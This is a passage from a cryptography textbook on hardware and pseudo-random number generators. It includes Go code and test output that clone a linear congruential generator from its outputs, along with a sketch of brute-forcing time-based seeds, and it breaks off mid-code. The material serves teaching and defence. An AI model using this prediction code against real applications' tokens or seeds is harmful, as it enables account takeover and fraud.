dictable output with newer and improved manufacturing processes. This is similar to
Zener diodes, where the RNG relies on a parasitic effect which is not a priority for
the manufacturing process (and is in many cases undesirable to begin with).
Ring oscillators have a poor physical defense. Anyone with a sine wave generator
can introduce sine-shaped noise (close to the ring oscillator frequency) on the power
source of the chip and the oscillator will lock onto that frequency, making the output
of the TRNG trivial for the attacker to guess. This is an example of “fault-injection”
attacks where the attacker tries to influence the output of a TRNG.
If you do decide to use ring oscillator-based TRNGs here are some best practices to
follow:
Add a simple binary counter to the output of the TRNG, so you know how many
times the ring oscillator toggled from a 0 to a 1. If, e.g., in the last minute (or some
other window) the number of ones drastically outweighs the number of zeros, the
discrepancy could indicate faulty operation.
Make the design public and expose raw access to the TRNG’s full counter output bits
so its health can be assessed.
If you use a fixed delay to sample the TRNG (the simplest solution used virtually
everywhere), then have an external health checker estimate the unpredictability (by
calculating the entropy using the equation 2.2) per sample from the TRNG.
Remember that ring oscillator TRNGs are subject to simple noise injection attacks.
If that’s okay for your threat model then you’re good. On the other hand, if you need
some physical protection, consider potting 3 over your IC, or putting some other
physical barrier to keep the attacker at least a few millimeters away, and preferably a
few inches.
If you have access to a secure flash on-chip, which cannot easily be read by an at-
tacker, consider seeding your CSPRNG from both the TRNG and a seed stored in
flash, and then update the seed in flash from the CSPRNG. This way, if your TRNG
degrades due to process drift, temperature, etc, you can integrate the TRNG output
over multiple boot cycles, and hopefully reach a computationally un-guessable state.
While the last recommendation applies in general to other TRNGs as well, ring oscillator-
based TRNGs should pay special attention to it owing to their poor defenses against fault-
injection attacks.
TRNGS BASED ON MODULAR ENTROPY MULTIPLICATION
The MEM architecture for RNGs takes thermal noise generated by a resistor and dou-
bles it repeatedly. This causes the voltage to grow exponentially. After it crosses a threshold
(the halfway point of the voltage range), instead of doubling the voltage itself it
doubles the excess over the halfway point and adds the result to the original voltage. Since
the operations are performed in a modular fashion (meaning the result never overflows,
much like a clock where adding four hours to 9 results in 1 instead of overflowing to 13),
the excess-doubling step ends up having a net subtractive outcome (i.e., going from the
larger number of 9 to the smaller number of 1 in the example presented above).
3 Potting (electronics). https://en.wikipedia.org/wiki/Potting_(electronics)
Based on these two simple rules the voltage keeps fluctuating quite unpredictably but
stays within its range. The MEM method has many distinct advantages for a TRNG:
It is resistant to electromagnetic noise injection or capacitive/inductive coupling at-
tacks.
It provides a physical model that can be used to continuously assess the health of the
RNG.
The components involved are very cheap and few in number and the design is unen-
cumbered by patents.
Several free schematics are available (e.g., Bill Cox’s infnoise 4 design or Peter’s re-
design known as REDOUBLER 5 ).
It is also very fast, with infnoise being able to run in excess of 100 Mbit/second. It
is important to understand though that speed itself should not be a critical factor for
TRNGs as their output should be used only to seed cryptographically secure pseudo-
random number generators that we will soon discuss in this chapter. In general 512
random bits from a TRNG should be enough to seed CSPRNGs as long as the lat-
ter upholds its own security guarantees (in chapter 3 we will dive deeper into how
CSPRNGs are compromised).

GUIDELINES FOR DESIGNING TRNGS


The foundations of cryptographic security rely on the quality of random numbers and
it all starts with true random number generators. Unfortunately, there is no single “right
way” of designing TRNGs, but given below are some rules of thumb that can be helpful:
A good TRNG has a physical model that proves to skeptics the rate-of-generation
and entropy of generated bits based on fundamental physical properties. This is not
true of either Zener noise or ring oscillator TRNGs.
The health checker should shut down access to a poorly functioning TRNG, even if
it halts the system.
Many TRNGs use “randomness extractors” (explained in the next section) to make
sure that the final output has enough entropy even when the underlying physical pro-
cess is not providing it sufficiently (e.g., the output becomes biased with fluctuation of
ambient temperature). A good TRNG should expose the raw output (without running
it through a randomness extractor) from the entropy source so that a health checker
can compare the bits generated to what the physical model predicts. Note that Intel’s
TRNG (accessed by the RDRAND assembly instruction – a popular source of ran-
domness), gives no such access, and the circuit between the entropy source and what
we read is secret.
On-chip TRNGs should defend against the simplest of physically present attacks,
such as power supply noise injection. Note that Intel’s TRNG behind the RDRAND
4 Infinite Noise TRNG. https://github.com/waywardgeek/infnoise
5 REDOUBLER. https://github.com/alwynallan/redoubler
instruction appears to be extremely sensitive to noise injection, based on their pub-
lished schematics and SPICE simulations.
Stand-alone TRNGs such as USB stick-based TRNGs should defend against mali-
cious hosts. Most USB stick TRNGs are trivially attacked by the host in such a way
that the attacker can forever predict "random" bits from the USB device, and there
may be no way to ever tell that the attack has occurred. This could happen to a TRNG
in transit in the mail or be perpetrated by anyone who has physical access to the device.
On every boot, have internal firmware verify the health of the TRNG.
If you assume that the TRNG will never fail or degrade in performance after produc-
tion, at least check its health (using the physical model for underlying phenomena)
during the production process.

REMOVING BIASES FROM TRNG OUTPUT WITH RANDOMNESS EXTRACTORS


The output from TRNGs is usually cleaned with a randomness extractor before being
used in real-world applications. This is needed because the physical source might not be
generating values with high enough entropy. A basic example of a randomness extractor
was given by John von Neumann (one of the pioneers in the field of computer science,
considered by some to be the Last Great Polymath 6): the extractor algorithm
(implemented either in hardware or software) looks at successive pairs of bits generated by an
RNG; if the two bits match, no output is generated, and if they differ, only the first
bit is output. This would convert a sequence like 00 11 00 10 01 01 00 00 10 00
01 10 10 01 00 to 1 0 0 1 0 1 1 0; we now have fewer bits but greater
entropy, making the output more unpredictable.

Randomness extractors
Randomness extractors clean noise generated from weakly random entropy sources
to produce high-quality random output.

2.2.2 Pseudo Random Number Generators (PRNG)


Sampling the physical world and cleaning that noise to generate high-quality random num-
bers is a slow process. Our demand for random numbers usually outpaces the supply pro-
vided by TRNGs. Applications therefore rarely consume them directly but rather rely on
another category of RNGs known as pseudo random number generators (PRNGs).
PRNGs are algorithms that take a seed number (or numbers) as input, perform some cal-
culations on it, and then generate an effectively unbounded stream of random-looking numbers based on that seed.
They are called deterministic because the same seed will make a PRNG always generate
the same output. This is in contrast to TRNGs, where it is impossible to clone the output
because the inputs are stochastic physical processes as opposed to a single number.

6 Thompson, P. (2018). John Von Neumann, the Last Great Polymath. Sothebys. https://www.sothebys.
com/en/articles/john-von-neumann-the-last-great-polymath
Figure 2.7 TRNGs are used to seed PRNGs

EXAMPLE: IMPLEMENTING LINEAR CONGRUENTIAL GENERATORS


A really simple PRNG can be created using just equation 2.3.

$$X_{n+1} = (aX_n + c) \bmod m \tag{2.3}$$


Where X is the sequence of random values and
m, 0 < m, is the "modulus"
a, 0 < a < m, is the "multiplier"
c, 0 ≤ c < m, is the "increment"
X0, 0 ≤ X0 < m, is the "seed" or initial value
Equation 2.3 is called a linear congruential generator (LCG) because new values are
related to past values linearly. We will implement an RNG based on an LCG. Since this is a
PRNG it is deterministic, which means we can use a reference RNG to compare our output.
As long as we use the same seed value our output should match the output generated
by a similar RNG. We will be using the LCG used by the C++ standard library for its
minstd_rand generator. Let’s first use the C++ version to generate reference values for a
given seed.
In listing 2.3 we are going to:
Use a fixed number for seeding the minstd_rand generator. Seeding with a hard-
coded value is pretty much akin to destroying a PRNG. PRNGs should be seeded
with truly random values obtained via TRNGs. For the time being, however, it is
okay, we want to generate a fixed output so that we can use it as a reference when
comparing it with output from our implementation.
Generate 11 outputs that we will use to compare our own LCG implementation
against.

Listing 2.3 ch02/lcg/cpp/main.cpp

1 #include <iostream>
2 #include <random>
3
4 int main() {
5 std::minstd_rand lcg_rand;
6
7 lcg_rand.seed(42);
8
9 for (int i = 0; i < 10; ++i) {
10 std::cout << lcg_rand() << ", ";
11 }
12 std::cout << lcg_rand() << std::endl;
13 }

We are using the minstd_rand generator that comes with the C++ standard library.
If you compile and run this file with the GNU C++ compiler, you will get a sequence of
numbers looking like this:
$ g++ main.cpp
$ ./a.out
2027382, 1226992407, 551494037, 961371815, 1404753842, 2076553157,
1350734175, 1538354858, 90320905, 488601845, 1634248641

Next, we are going to implement this generator in Go ourselves using equation 2.3. The
LCG used by the C++ counterpart uses constant values given in equation 2.4.

$$m = 2^{31} - 1, \quad a = 48271, \quad c = 0 \tag{2.4}$$

By plugging these constants in the LCG equation, and seeding with the same input (42),
we should get the same sequence of numbers back. Let’s write a program to do so.
Starting with the next example we will be splitting a single code file among multiple
listings in the book to make it easier to follow along. The full code for these examples can
be found in the book repository at https://github.com/krkhan/crypto-impl-
exploit. The book listings will only be focusing on specific portions that are important
or new to the discussion taking place. Please note that listing 2.4 starts at line 3.

Listing 2.4 ch02/lcg/go/impl_lcg/impl_lcg.go

3 type LCG struct {
4     multiplier int
5     increment int
6     modulus int
7     currentValue int
8 }

The fields multiplier, increment and modulus have been covered above as parts of
equation 2.3. Similarly, currentValue corresponds to Xn. The next value Xn+1 is there-
fore generated via the following function, which returns the old value and moves the RNG
one step forward. We continue listing the ch02/lcg/go/impl_lcg/impl_lcg.go file in listing 2.5,
starting from line 21 now.

Listing 2.5 ch02/lcg/go/impl_lcg/impl_lcg.go

21 func (lcg *LCG) Generate() int {
22     oldValue := lcg.currentValue
23     lcg.currentValue = (lcg.multiplier*oldValue + lcg.increment) % lcg.modulus
24     return oldValue
25 }

To test this LCG we will initialize it with the constants used in the C++ minstd_rand
generator – including the seed value of 42 (the same one we used in listing 2.3). Please
note that listing 2.6 refers to a different file name from the accompanying code repo.

Listing 2.6 ch02/lcg/go/impl_lcg/impl_lcg_test.go

7 func TestLCG(t *testing.T) {
8     multiplier := 48271
9     increment := 0
10     modulus := 1<<31 - 1 // 2^n = 1 << n, so 1<<31 is 2^31
11     seed := 42
12     lcg := NewLCG(multiplier, increment, int(modulus), int(seed))
13     expectedValues := []int{2027382, 1226992407, 551494037, 961371815,
14         1404753842, 2076553157, 1350734175, 1538354858, 90320905,
15         488601845, 1634248641}
16     for _, expected := range expectedValues {
17         generated := lcg.Generate()
18         if expected != generated {
19             t.Fatalf("Generated: %d, Expected: %d", generated, expected)
20         }
21     }
22 }

Let’s run the test:


$ make impl_lcg
go clean -testcache
go test -v ./ch02/lcg/go/impl_lcg
=== RUN TestLCG
--- PASS: TestLCG (0.00s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch02/lcg/go/impl_lcg 0.027
s

Our LCG produced the same output as the C++ one. The output sequence looks random
but as we’ll see in the next section, even if an attacker knows nothing about the internal
parameters of this LCG they can easily predict future outputs just by observing it in action
for a while. For the time being, we can see that a PRNG:
Has an algorithm that it uses to keep generating values.
Starts with a seed as input for the first run of that algorithm.
Has an internal state which keeps mutating according to the algorithm. In our LCG
example, the state was Xn , stored in lcg.currentValue.
This is shown in figure 2.8.
At some point, every PRNG starts repeating values. The number of steps it takes for a
PRNG to start repeating values is known as its period. For the LCG we implemented, the
period is 2^31 − 2, meaning it will start repeating its output after generating 2147483646
values (with c = 0 and a prime modulus, the state can never be 0, so the period is at most m − 1).
Figure 2.8 PRNGs have a state and are initialized with a seed. The PRNG algorithm keeps mutating the
state.

EXAMPLE: EXPLOITING LINEAR CONGRUENTIAL GENERATORS


Let's say you have no idea what the parameters (multiplier, increment, modulus)
of an LCG are. Each time you observe a value, you know the RNG's current state (since the
algorithm just outputs the state, a single number, without any modification when gener-
ating a new value). Could you predict the future output of an LCG just by observing some
values? That is, if you saw the LCG produce some values X0, X1, X2 up to Xn, would you
be able to predict Xn+1 if you didn't know anything about the LCG's initial configuration?
We revisit our LCG description in equation 2.5.

$$X_{n+1} = (aX_n + c) \bmod m \tag{2.5}$$

We can start with a simple scenario by assuming that we (as attackers) have the multi-
plier a and the modulus m but not the increment c. We can simply observe two values X0
and X1 and find out the increment by rearranging the equation as shown in equation 2.6.

$$\begin{aligned} X_1 &= (aX_0 + c) \bmod m \\ c &= (X_1 - aX_0) \bmod m \end{aligned} \tag{2.6}$$

This is shown in listing 2.7.

Listing 2.7 ch02/lcg/go/exploit_lcg/exploit_lcg.go

49 func findIncrement(originalRng *impl_lcg.LCG, modulus, multiplier int) int {
50     s0, s1 := originalRng.Generate(), originalRng.Generate()
51     return (s1 - s0*multiplier) % modulus
52 }

Let’s say we know the modulus but neither the increment nor the multiplier. Can we
recover the multiplier? This time we observe three values X0 , X1 and X2 . We can find out
the multiplier using these values as shown in equation 2.7.
$$
\begin{aligned}
X_1 &= (aX_0 + c) \bmod m \\
X_2 &= (aX_1 + c) \bmod m \\
X_2 - X_1 &= (aX_1 - aX_0) \bmod m \\
X_2 - X_1 &= (a(X_1 - X_0)) \bmod m \\
a &= \left(\frac{X_2 - X_1}{X_1 - X_0}\right) \bmod m
\end{aligned} \tag{2.7}
$$
There is a problem though: we need to find the inverse of a value (X1 − X0). Finding
the multiplicative inverse of something is easy for rational numbers. For example, the
multiplicative inverse of 5 is 1/5; for 3/7 it is 7/3; and so on. For modular arithmetic, it's a little
tricky. We are all familiar with the modular arithmetic of 12-hour clocks, where 10 plus
3 hours is 1 (modulo 12). What is the multiplicative inverse of, let's say, 7 mod 12? We
need to find some n to multiply 7 with that would result in a product congruent to 1. There is no 1/7 to pick
among the integers modulo 12.
As it turns out, the multiplicative inverse of 7 modulo 12 is 7 itself! 7 times 7 is equal to
49, which is only 1 more than a multiple of 12. As you can see, the multiplicative inverse
is not straightforward in modular arithmetic. Finding the modular multiplicative inverse has
many interesting solutions, but we are going to use the one provided by the Go standard
library itself. Unfortunately, the code for doing so will seem a little clunky right now, as
shown in listing 2.8. In the next chapter, we shall explore the “big numbers” library from
Go in further detail.

Listing 2.8 ch02/lcg/go/exploit_lcg/exploit_lcg.go

3 import (
4     "github.com/krkhan/crypto-impl-exploit/ch02/lcg/go/impl_lcg"
5     "math/big"
6 )
7
8 func findModInverse(a, m int64) int64 {
9     return new(big.Int).ModInverse(big.NewInt(a), big.NewInt(m)).Int64()
10 }

Now that we have a function to calculate modular multiplicative inverse with, we can
implement equation 2.7 in listing 2.9.

Listing 2.9 ch02/lcg/go/exploit_lcg/exploit_lcg.go

38 func findMultiplier(originalRng *impl_lcg.LCG, modulus int) int {
39     s0, s1, s2 := originalRng.Generate(), originalRng.Generate(), originalRng.Generate()
40     inverse := int(findModInverse(int64(s1-s0), int64(modulus)))
41     multiplier := (s2 - s1) * inverse % modulus
42     if multiplier < 0 { // convert negative multiplier to positive if needed
43         return modulus + multiplier
44     } else {
45         return multiplier
46     }
47 }

Finding the modulus is the hardest part. Let’s say we are trying to find the upper limit of
the hour hand on a clock. In other words, we see numbers like 3, 5, 1, 11, 7, 8, etc., and we
are trying to find out how high they go when people talk about them. Sure, you know it’s 12
for the scenario of a clock, but let’s say you were an alien who didn’t know that beforehand.
Somehow you were able to drop in on human conversations about daily plans. You could
probably infer that (for the hour hand on the clock) 11 is the highest number people talk
about. However, in a particularly uneventful place, you might end up assuming that
people’s plans go at most up to only 8 PM, so that the whole circle represents only nine
hours in total. On the other hand, if you had an automatic counter scanning all the eggs
coming into a supermarket, once you saw the totals 204, 120, 132, 84, 240 and 348
you might reasonably conclude that the eggs come in crates of a dozen, because the
greatest common divisor (GCD) of all those numbers is 12. In other words, all of these
multiples of a dozen are congruent to zero modulo 12.
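The egg-counting intuition can be checked in a few lines of Go. This is our own standalone sketch, using the same math/big GCD call that the book’s findGCD helper relies on:

```go
package main

import (
	"fmt"
	"math/big"
)

// findGCD returns the greatest common divisor of two positive integers
// via math/big, mirroring the book's helper.
func findGCD(a, b int64) int64 {
	return new(big.Int).GCD(nil, nil, big.NewInt(a), big.NewInt(b)).Int64()
}

func main() {
	// The egg totals from the analogy above.
	counts := []int64{204, 120, 132, 84, 240, 348}
	gcd := counts[0]
	for _, v := range counts[1:] {
		gcd = findGCD(gcd, v)
	}
	fmt.Println(gcd) // 12: the eggs arrive in crates of a dozen
}
```

Folding GCD pairwise over a list like this is exactly how the modulus-recovery code will later combine its collected “zero” values.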
To find the modulus of our LCG we need to find values that are congruent to zero
modulo m. Let’s generate a bunch of values this time, as shown in equation 2.8.

X1 = (aX0 + c) mod m
X2 = (aX1 + c) mod m (2.8)
X3 = (aX2 + c) mod m

If we take the differences between each pair of consecutive values we get the equation
2.9.

Δ0 = (X1 − X0 ) mod m
Δ1 = (X2 − X1 ) mod m (2.9)
Δ2 = (X3 − X2 ) mod m

We can substitute the values of X2 and X1 with their definitions from 2.8, resulting in
equation 2.10. Please note that the increment c is canceled out during the substitution.
Therefore, each ΔN is a multiple of ΔN−1 modulo m.

Δ1 = (X2 − X1 ) mod m
Δ1 = (aX1 − aX0 ) mod m
Δ1 = (a(X1 − X0 )) mod m
(2.10)
Δ1 = (aΔ0 ) mod m
Δ1  Δ0 mod m
Δ2  Δ1 mod m
Equation 2.10 can be used to find large numbers congruent to zero modulo m. Let’s call
these “zeros”; they can be found by rearranging equation 2.10 into equation 2.11.

Zero = Δ2Δ0 − Δ1Δ1
Zero ≡ a^2Δ0^2 − a^2Δ0^2 (mod m)
Zero ≡ 0 (mod m)
(2.11)

We can collect such “zero” values (which are non-zero integers but are congruent to
zero modulo m because they are multiples of m, similar to how 24, 36, 72 and 48 are
multiples of 12) and then calculate their GCD to find the modulus. To calculate the GCD
we will use the Go big library again as shown in listing 2.10.

Listing 2.10 ch02/lcg/go/exploit_lcg/exploit_lcg.go

12 func findGCD(a, b int64) int64 {
13 return new(big.Int).GCD(nil, nil, big.NewInt(a), big.NewInt(b)).Int64()
14 }

In listing 2.11 we:
Generate 1000 values using the original RNG.
Calculate differences between each value and its immediately preceding value.
Apply equation 2.11 to find zeros on line 27.
Find GCD of zero values on line 32 and return that as the modulus.

Listing 2.11 ch02/lcg/go/exploit_lcg/exploit_lcg.go

16 func findModulus(originalRng *impl_lcg.LCG) int {
17 var diffs []int
18 previousValue := originalRng.Generate()
19 for i := 0; i < 1000; i++ {
20 currentValue := originalRng.Generate()
21 diffs = append(diffs, currentValue-previousValue)
22 previousValue = currentValue
23 }
24
25 var zeros []int
26 for i := 2; i < len(diffs); i++ {
27 zeros = append(zeros, diffs[i]*diffs[i-2]-diffs[i-1]*diffs[i-1])
28 }
29
30 gcd := 0
31 for _, v := range zeros {
32 gcd = int(findGCD(int64(gcd), int64(v)))
33 }
34
35 return gcd
36 }
Listing 2.12 puts all of these pieces together in a function called CloneLCG() which
takes an LCG as input and then “clones” it by recovering the modulus, multiplier and
increment strictly by observing generated values of the original RNG. We generate one
last value from the original RNG on line 58 to act as the seed for our newly cloned RNG.

Listing 2.12 ch02/lcg/go/exploit_lcg/exploit_lcg.go

54 func CloneLCG(originalRng *impl_lcg.LCG) *impl_lcg.LCG {
55 modulus := findModulus(originalRng)
56 multiplier := findMultiplier(originalRng, modulus)
57 increment := findIncrement(originalRng, modulus, multiplier)
58 seed := originalRng.Generate()
59 clonedRng := impl_lcg.NewLCG(multiplier, increment, modulus, seed)
60 return clonedRng
61 }

Listing 2.13 tests our CloneLCG() function by creating an LCG and seeding it with the
current UNIX time in seconds. We then clone the LCG and generate 100 values to ensure
that the cloned RNG and original RNG are generating the same values, or in other words,
the cloned RNG is predicting the original RNG correctly.

Listing 2.13 ch02/lcg/go/exploit_lcg/exploit_lcg_test.go

54 func TestCloneLCG(t *testing.T) {
55 multiplier := 48271
56 increment := 0
57 modulus := 1<<31 - 1
58 seed := time.Now().Unix()
59
60 originalRng := impl_lcg.NewLCG(multiplier, increment, modulus, int(seed))
61 clonedRng := CloneLCG(originalRng)
62
63 for i := 0; i < 100; i++ {
64 clonedValue := clonedRng.Generate()
65 observedValue := originalRng.Generate()
66 if observedValue != clonedValue {
67 t.Fatalf("observed: %08x, cloned: %08x", observedValue, clonedValue)
68 }
69 if i%20 == 0 {
70 t.Logf("observed: %08x, cloned: %08x", observedValue, clonedValue)
71 }
72 }
73 }

You can run these tests using make exploit_lcg in the code repo:
$ make exploit_lcg
go clean -testcache
go test -v ./ch02/lcg/go/exploit_lcg
=== RUN TestCloneLCG
exploit_lcg_test.go:26: observed: 52e4acba, cloned: 52e4acba
exploit_lcg_test.go:26: observed: 72008d98, cloned: 72008d98
exploit_lcg_test.go:26: observed: 797724ca, cloned: 797724ca
exploit_lcg_test.go:26: observed: 2f7f18a9, cloned: 2f7f18a9
exploit_lcg_test.go:26: observed: 4672328b, cloned: 4672328b
--- PASS: TestCloneLCG (0.00s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch02/lcg/go/exploit_lcg 0.031s

We were able to successfully clone a linear-congruential generator just by observing its
output. Now we can stay one step ahead of the RNG, as we will always know which value
it is going to generate next. Despite their widespread usage as general-purpose RNGs, LCGs
are not suited for use in cryptography. In the next section, we shall take a look at what
it would take for an RNG to be cryptographically secure.

2.2.3 Cryptographically Secure Pseudo Random Number Generators (CSPRNG)
We saw that a good PRNG should have a uniform output distribution to achieve maximum
entropy. It should have a long period so that values do not start repeating themselves too
soon. Are these properties enough to warrant the use of a PRNG in cryptographic
applications? Not really: we were able to break LCGs quite easily. There are a few other properties
we need to worry about when using PRNGs in cryptographic contexts.
Imagine that you can drop into the middle of the process while a PRNG is generating
a number, e.g., in figure 2.1. Everything about the PRNG, including its algorithms and
constants, is known to us as the attackers.
You see the following stream of numbers being produced by the RNG:
1538354858, 90320905, 488601845, 1634248641

To be cryptographically secure, this PRNG should satisfy the following properties:
An attacker should not be able to look at these values and deduce that they came from
a PRNG (versus some random noise).
An attacker should not be able to guess past values (the ones before 1538354858) by
looking at this output. This is referred to as forward secrecy.
An attacker should not be able to guess future values (the ones after 1634248641)
by looking at this output. This is referred to as backward secrecy. (Don’t worry if the
direction of forward/backward sounds particularly confusing, you are not alone.)
Now let us say that this output was generated by the LCG we implemented in the previous
section. It is not cryptographically secure because it satisfies none of those properties.
Remember, the algorithm itself and all the constants are known to the attacker. To predict
future values, all they need to do is to seed their own LCG clone with 1634248641 and
then start generating values independent of the original RNG. Similarly, they can work
out values before 1538354858 by rearranging the terms of equation 2.3.
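Running an LCG backwards is a one-liner once you have a modular inverse. The standalone sketch below is our own illustration of that rearrangement; the constants match the MINSTD-style parameters used in the chapter’s test (multiplier 48271, increment 0, modulus 2^31 − 1), and previousValue is a hypothetical helper, not part of the book’s impl_lcg package.

```go
package main

import (
	"fmt"
	"math/big"
)

const (
	multiplier int64 = 48271
	increment  int64 = 0
	modulus    int64 = 1<<31 - 1
)

// nextValue is the normal LCG step: x' = (a*x + c) mod m.
func nextValue(x int64) int64 {
	return (multiplier*x + increment) % modulus
}

// previousValue rearranges the LCG equation to run it in reverse:
// x = a^-1 * (x' - c) mod m. The inverse exists because the modulus is prime.
func previousValue(x int64) int64 {
	aInv := new(big.Int).ModInverse(big.NewInt(multiplier), big.NewInt(modulus)).Int64()
	prev := (x - increment) % modulus * aInv % modulus
	if prev < 0 {
		prev += modulus
	}
	return prev
}

func main() {
	seed := int64(42)
	x1 := nextValue(seed)
	x2 := nextValue(x1)
	// Walking backward from x2 recovers x1 and then the seed.
	fmt.Println(previousValue(x2) == x1)   // true
	fmt.Println(previousValue(x1) == seed) // true
}
```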
If you look at the PRNG in figure 2.8, at each step we can see that the previous state is
mutated to generate a new state. We can visualize this as shown in figure 2.9.

Figure 2.9 PRNGs mutate the previous state to generate the next one.

If an attacker sees the output on the right of this box, they immediately know the internal
state of the PRNG, since the state is the output. In other words, there is no difference
between the internal state of our PRNG and the output it generates. This immediately
thwarts backward secrecy because the attacker can simply replicate the state by looking at
the output and then use the publicly-known algorithm to generate new values.
We address this by adding another dotted arrow between the state and the output as
shown in figure 2.10.

Figure 2.10 Some PRNGs transform the state before outputting it as the next value.

The dotted arrows represent transformations that are hard to reverse. This means that if
someone knows the output on the right, it should be hard for them to calculate the state
and by extension, the previous values (coming into the box from the left). The next block
would therefore look like figure 2.11.
We can now visualize our PRNGs as a “state-machine” as shown in figure 2.12.
There are three functions in figure 2.12:
Init(Seed) transforms the seed to generate State0 .

Next(StateN ) transforms StateN to generate StateN+1 .

Output(StateN ) transforms StateN to generate OutputN .


Next(StateN ) and Output(StateN ) represent the dotted arrows in figure 2.10. CSPRNGs
choose these functions carefully to ensure that they are hard to reverse. In weak PRNG
implementations, they are sometimes combined so that a single function call performs both
Next and Output, advancing the state by one step and returning the new
value, as we saw in the case of our LCG implementation. Some PRNGs
utilize the same state to output several different values, before mutating the state to the
next step. We will see an example of this in Chapter 3.
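To make the state-machine picture concrete, here is a toy sketch of the three functions in figure 2.12, with SHA-256 standing in for the hard-to-reverse dotted arrows. This is our own illustration for building intuition only, not a vetted CSPRNG design; the prefixes and names are arbitrary choices.

```go
package main

import (
	"crypto/sha256"
	"encoding/binary"
	"fmt"
)

// toyPRNG keeps a 256-bit internal state that is never exposed directly.
type toyPRNG struct {
	state [32]byte
}

// Init(Seed): derive State0 from the seed with a one-way function.
func newToyPRNG(seed []byte) *toyPRNG {
	return &toyPRNG{state: sha256.Sum256(append([]byte("init:"), seed...))}
}

// Generate applies Output(StateN) and Next(StateN) with different hash
// prefixes, so observing an output does not reveal the state that produced it.
func (p *toyPRNG) Generate() uint64 {
	out := sha256.Sum256(append([]byte("out:"), p.state[:]...))
	p.state = sha256.Sum256(append([]byte("next:"), p.state[:]...))
	return binary.BigEndian.Uint64(out[:8])
}

func main() {
	rng := newToyPRNG([]byte("example seed"))
	for i := 0; i < 3; i++ {
		fmt.Printf("%016x\n", rng.Generate())
	}
}
```

Contrast this with our LCG, where Output was the identity function: here an attacker who sees out cannot walk back to state without inverting SHA-256.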
PRNGs such as the one shown in figure 2.12 can be attacked in a few ways. The two
most common methods are explained below.
Figure 2.11 Two consecutive steps for a PRNG

Figure 2.12 PRNG as a “state-machine”

Input-based attacks: Every PRNG needs to be seeded. If an attacker can guess the
seed they can recover the entire output by simply running the PRNG on that seed.
For example, it used to be common practice in applications to seed using the system
time. Similar to the birthday password-guessing we saw earlier in this chapter, the
attacker can simply guess all the seconds in the last month to find the right seed. For
our LCG examples, we used a fixed seed of 42 precisely because we want to generate
a fixed output that we would then be able to compare to a reference implementation.
To protect against these attacks, TRNGs are used to seed the input of PRNGs.
Remember, TRNGs produce random numbers based on physical phenomena but are
not very performant. PRNGs provide good performance but rely on a seed value,
which can lead to input-based attacks. The solution is to combine them as shown in
figure 2.7.
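The time-based seeding attack can be sketched in a few lines. The LCG below is a minimal stand-in for the book’s impl_lcg package so the example is self-contained, and recoverTimeSeed is a hypothetical attacker helper of our own invention:

```go
package main

import (
	"fmt"
	"time"
)

// lcg is a minimal multiplicative LCG with the chapter's parameters.
type lcg struct{ state int64 }

func (l *lcg) Generate() int64 {
	l.state = (48271 * l.state) % (1<<31 - 1)
	return l.state
}

// recoverTimeSeed guesses every second in the past window until one candidate
// seed reproduces the observed output.
func recoverTimeSeed(observed, now, window int64) (int64, bool) {
	for seed := now; seed > now-window; seed-- {
		candidate := lcg{state: seed % (1<<31 - 1)}
		if candidate.Generate() == observed {
			return seed, true
		}
	}
	return 0, false
}

func main() {
	// The "victim" seeds with the current UNIX time.
	now := time.Now().Unix()
	victim := lcg{state: now % (1<<31 - 1)}
	observed := victim.Generate()

	// The attacker only sees one output and brute-forces recent seconds.
	seed, ok := recoverTimeSeed(observed, time.Now().Unix(), 3600)
	fmt.Println(ok, seed == now)
}
```

Because one LCG step is a bijection modulo a prime, a single observed value pins down the seed uniquely within the guessed window; with only 3,600 candidates the search is instantaneous.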
State Compromise Extension Attacks: If an attacker can compute the internal state
of a PRNG (essentially by somehow reversing the Next() function in figure 2.12), they can
compute all the future values that will be generated by this PRNG. We will cover this
in much more detail in the next chapter, where we will implement two such attacks.
2.3 Summary
Random numbers are used extensively in cryptographic applications.
Random number generators are characterized by their output distribution and entropy.
The entropy of an RNG is maximized when its output distribution is uniform.
Hardware random number generators (HRNGs), also known as true random number
generators (TRNGs), sample physical phenomena to generate a slow but unpredictable
stream of output.
TRNGs need to be carefully designed and tested to ensure good quality randomness.
Since they are used as input to CSPRNGs, which eventually generate all the randomness
needed for cryptography, good security begins at the TRNG.
TRNGs can be based on a variety of physical phenomena ranging from nuclear decay
to noise in electrical circuits.
Avalanche and Zener diodes are widely used in TRNG constructions but are susceptible
to attacks and do not provide a good way to assess the health of the RNG process.
Modular entropy multiplication is a relatively new method for constructing TRNGs
which also provides a physical model to assist in continuous monitoring of the RNG’s
health.
Pseudo-random number generators (PRNGs) take seed values as input and generate
a fast but deterministic stream of output.
Cryptographically secure random number generators (CSPRNGs) are PRNGs that
satisfy some additional properties, most importantly backward and forward security.
Always use CSPRNGs for cryptographic applications and avoid weak PRNGs that
are used by default in many programming languages.
Seed your CSPRNGs with good-quality seeds obtained from TRNGs.
Periodically reseed your CSPRNG so that the same seed is not used forever. This
helps protect against state compromise extension attacks.
PRNGs are usually compromised by guessing their seed or by reverse-engineering
their internal states.
Linear congruential generators (LCGs) are very basic (and insecure) PRNGs; there is
no difference between their state and output.
LCG-based RNGs can be broken by recovering their parameters (increment, multiplier,
modulus) from generated values using modular arithmetic.
3
Implementing and exploiting RNGs

This chapter covers
How cryptographically-secure pseudo-random number generators (CSPRNGs) are implemented
How CSPRNGs can be compromised via specific weaknesses in their underlying algorithms

In the previous chapter, we saw how pseudo-random number generators (PRNGs) work
in theory. In this chapter, we will implement two widely-known RNGs and then write code
to exploit them. One of them was a CSPRNG recommended by NIST (National Institute
of Standards and Technology)! 1
Init(Seed) transforms the seed to generate State0 .

Next(StateN ) transforms StateN to generate StateN+1 .

Output(StateN ) transforms StateN to generate OutputN .

As we cover two examples in this chapter we will see how those functions are imple-
mented by the respective RNGs.

1 Cryptographic implementations widely rely on algorithms and constants defined by NIST standards.
Figure 3.1 PRNGs mutate the previous state to generate the next one.

3.1 Implementing and exploiting Mersenne Twister-based RNGs
Mersenne Twister RNGs are based on Mersenne prime numbers, which are prime numbers
of the form Mn = 2^n − 1 (in turn named after the 17th-century French
polymath Marin Mersenne). They are widely used in many programming languages such
as Ruby, PHP, Python and C++. They have extremely long periods, i.e., their output
starts repeating only after generating 2^n − 1 values for an RNG based on the Mersenne
prime Mn.
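To get a feel for the sizes involved, a short standalone math/big sketch (our own illustration, not from the book’s repo) prints the first few Mersenne primes and the number of decimal digits in MT19937’s prime:

```go
package main

import (
	"fmt"
	"math/big"
)

// mersenne returns M_n = 2^n - 1 as an arbitrary-precision integer.
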